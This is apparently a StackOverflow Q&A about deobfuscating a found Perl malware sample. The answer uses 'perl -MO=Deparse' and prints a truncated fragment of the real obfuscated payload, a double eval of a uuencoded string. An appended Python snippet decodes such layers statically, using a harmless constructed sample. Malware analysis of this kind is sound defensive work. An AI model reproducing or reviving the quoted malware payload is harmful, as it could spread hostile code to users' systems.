Question

I've found some malware and would like to analyse it further. How could I deobfuscate this? http://bpaste.net/raw/142790/

Thanks. :)


Solution

You can try with Deparse,

perl -MO=Deparse malware.pl

So it uses double eval inside regex code block,

'' =~ /(?{eval"eval unpack u=>q\{_;7DD<')O8V5S<V\\](EQX-D%<>#8Q7'\@W-EQX-C\$B.VUY)&QI;F%S7VUA>#TB7'\@S,5QX,S`B.VUY)'-L965P_\/2)<>#,S(CMM>4!H;W-T875T:#TH(EQX,D\$B*3MM>4!C86YA:7,]*\")<>#(S7'\@R,UQX-S!<>#8U7'\@W,EQX_-D,B*3MM>4!N:6-K;F%M93UG
971N:6-K*\"D[;7DD;FEC:STD;FEC:VYA;65;<F%N9\"!S8V%L87)`;FEC:VYA_;65=.VUY0'!R:79N86UE\/6=E=&]N;W=N97(H*3MM>21I<F-N86UE\/21P<FEV;F%M95MR86YD('-C86QA<D!P_<FEV;F%M95T[8VAO<\"AM>21R96%L;F%M93TB7'\@T15QX-CE<>#4X(BD[;7DD<V5R=FED;W(](EQX,S9<>#,V_

...
Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
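
Added example (not part of the original answer): a static decoder that peels one `unpack u=>q{...}` layer like the one shown above without ever invoking perl. The sample string, `uudecode` and `peel_layer` are constructed for illustration; the wrapper shape is taken from the snippet in the answer.

```python
import re

# Constructed sample (not the pastebin payload): same wrapper shape as the
# snippet above, hiding the harmless one-liner  print("second layer");
SAMPLE = r"""'' =~ /(?{eval"eval unpack u=>q\{6<')I;G0H(G-E8V]N9\"!L87EE<B(I.P``}"})/;"""

def uudecode(text: str) -> bytes:
    """Pure-Python equivalent of Perl's unpack('u', ...); nothing is executed."""
    out = bytearray()
    for line in text.splitlines():
        if not line:
            continue
        n = (ord(line[0]) - 32) & 0x3F              # first char = decoded length
        body = line[1:].ljust(-(-n // 3) * 4, "`")  # pad short lines with zeros
        v = [(ord(c) - 32) & 0x3F for c in body]    # space and ` both map to 0
        chunk = bytearray()
        for i in range(0, len(v) - 3, 4):
            a, b, c, d = v[i:i + 4]
            chunk += bytes([(a << 2 | b >> 4) & 0xFF,
                            (b << 4 | c >> 2) & 0xFF,
                            (c << 6 | d) & 0xFF])
        out += chunk[:n]
    return bytes(out)

def peel_layer(perl_src: str, dq_wrapped: bool = True) -> str:
    """Return the source hidden in `unpack u=>q{...}` as text, for reading only."""
    m = re.search(r"unpack\s+u\s*=>\s*q\\?\{(.*?)\\?\}", perl_src, re.S)
    if m is None:
        raise ValueError("no `unpack u=>q{...}` payload found")
    payload = m.group(1)
    if dq_wrapped:
        # Assumption: inside eval"...", the obfuscator escaped each special
        # character with one backslash (\" \$ \@ \\), as in the snippet above.
        payload = re.sub(r"\\(.)", r"\1", payload, flags=re.S)
    payload = re.sub(r"\\([\\{}])", r"\1", payload)  # q{} only unescapes \\ \{ \}
    return uudecode(payload).decode("latin-1")

if __name__ == "__main__":
    print(peel_layer(SAMPLE))
```

`perl -MO=Deparse` compiles the script, so any BEGIN blocks or `use` statements in it still execute; run it only in an isolated analysis VM. If the decoded text is itself another `eval unpack` layer, feed it back into `peel_layer` with `dq_wrapped=False` when that layer is not inside a double-quoted string.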